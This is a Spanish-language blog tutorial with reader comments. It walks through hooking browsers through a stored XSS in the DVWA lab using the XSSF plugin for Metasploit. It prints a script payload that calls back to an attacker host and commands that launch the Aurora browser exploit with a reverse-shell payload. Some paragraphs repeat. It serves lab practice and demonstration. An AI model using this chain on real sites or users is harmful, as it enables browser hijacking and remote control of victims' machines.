En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.
Jugando con XSSF
Para realizar estas pruebas vamos a utilizar el DVWA, un framework para testing de vulnerabilidades web, instalado sobre una VM Windows XP y nuestro Backtrack 4 R2.
Lo primero que vamos a hacer es descargar el XSSF framework desde aquí y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
Lo primero que vamos a hacer es descargar el XSSF framework desde aquí y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit cd /opt/metasploit/msf3 wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip unzip XSSF.zip cd XSSF cp -r data/ lib/ modules/ plugins/ ../ # Iniciamos Metasploit y cargamos el XSSF msfconsole load XSSF
Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:
<
script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>
Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.
Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":
Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":
Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":
Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:
use auxiliary/xssf/alert set VictimIDs 2 set AlertMessage "Game Over"
También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:
use exploit/windows/browser/ms10_002_aurora set SRVPORT 80 set PAYLOAD windows/shell/reverse_tcp set LHOST IP_BACKTRACK set URIPATH dvwa/vulnerabilities/xss_s/
Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:
jobs xssf_active_victims xssf_exploit victimID jobID
Espero que les haya gustado mi primer post! :)
Referencias:
- http://www.metasploit.com/redmine/issues/2995
- http://www.dvwa.co.uk/
Publicado por Lucas Duarte Wulfert en www.KUNGFOOSION.com
6 comentarios:
Interesante, muy interesante!! me gusta..
Gracias Lucas!
Lu, está muy bueno el post. Felicitaciones!!! :)
Muy interesante el tema, especialmente cuando necesitás demostrar el riesgo de las vulnerabilidades XSS.
Otra manera de hacer lo mismo es utilizar BeEF framework + Metasploit.
Saludos!
Lo estuve probando, me faltaba darle 'run' para que correr AlertMessage :P, jeje. Muy bueno Lucas!
Gracias!
Diego
Lo estuve probando, me faltaba darle 'run' para que correr AlertMessage :P, jeje. Muy bueno Lucas!
Gracias!
Diego
Enhorabuena por el tuto. Pero tengo una duda que no me deja validar la vulnerabilidad. Cuando inserto la sentencia con la IP atacante, la víctima aparece pero no permanece activa, por lo que no puedo lanzar el exploit. ¿Qué debo hacer para que la víctima permanezca activa y poder atacarla? Gracias
Publicar un comentario